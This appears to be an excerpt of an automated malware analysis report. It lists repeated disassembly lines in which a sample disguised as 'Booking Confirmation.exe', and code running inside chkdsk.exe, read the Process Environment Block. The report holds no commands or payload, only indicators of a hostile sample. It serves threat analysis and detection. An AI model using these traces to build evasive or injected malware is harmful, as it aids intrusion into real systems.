            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0188746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01878794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018E7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018E7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018E7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018A37F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0189A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0189A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0193070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0193070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0188F716 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018FFF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018FFF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01864F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01864F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0189E730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0187EF40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0187FF60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01938F6A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018FFE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018E46A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01930EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01930EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01930EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01938ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018936CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018A8EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0191FEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018776E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_018916E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0186C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0186C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0186C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01898E00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0189A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0189A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01921608 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0186E620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0191FE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01877E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01877E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01877E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01877E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01877E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_01877E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0192AE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0192AE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0187766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0188AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0188AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0188AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0188AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeCode function: 5_2_0188AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04DB8CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04DA14FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D66CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D66CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D66CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CF849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D7C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D7C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D1A44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D0746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04DB740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04DB740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04DB740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04DA1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04DA1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04DA1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04DA1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04DA1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04DA1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04DA1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04DA1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04DA1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04DA1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04DA1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04DA1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04DA1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04DA1C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D66C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D66C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D66C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D66C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D1BC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D66DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D66DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D66DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D66DC9 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D66DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D66DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D98DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CFD5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CFD5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04DAFDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04DAFDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04DAFDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04DAFDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CE2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CE2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CE2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CE2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CE2D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D1FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D1FD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D12581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D12581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D12581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D12581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D11DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D11DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D11DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D135A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04DB05AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04DB05AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D07D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D23D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D63540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D0C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D0C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D6A537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04DAE539 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D14D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D14D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D14D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04DB8D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CF3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CF3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CF3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CF3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CF3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CF3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CF3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CF3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CF3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CF3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CF3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CF3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CF3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CEAD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04DB8ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D28EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D9FEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D136CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CF76E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D116E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D7FE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D646A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04DB0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04DB0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04DB0EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CF7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CF7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CF7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CF7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CF7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CF7E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04DAAE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04DAAE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CF766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D0AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D0AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D0AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D0AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D0AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D1A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D1A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CEC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CEC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CEC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D18E00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04DA1608 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D9FE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CEE620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D237F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D67794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D67794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D67794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CF8794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CFEF40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CFFF60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04DB8F6A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D0F716 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D7FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D7FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04DB070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04DB070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D1A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D1A70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CE4F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CE4F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D1E730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D7B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D7B8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D7B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D7B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D7B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D7B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CE58EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CE9080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D63884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D63884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D1F0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D1F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D1F0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D120A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D120A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D120A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D120A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D120A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D120A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D290AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D00050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D00050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04DA2073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04DB1074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D67016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D67016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D67016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04DB4015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04DB4015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CFB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CFB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CFB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CFB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D1002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D1002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D1002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D1002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D1002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CEB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CEB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CEB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D741E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D12990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D0C182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D1A185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D651BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D651BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D651BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D651BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D669A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D161A0 mov eax, dword ptr fs:[00000030h]
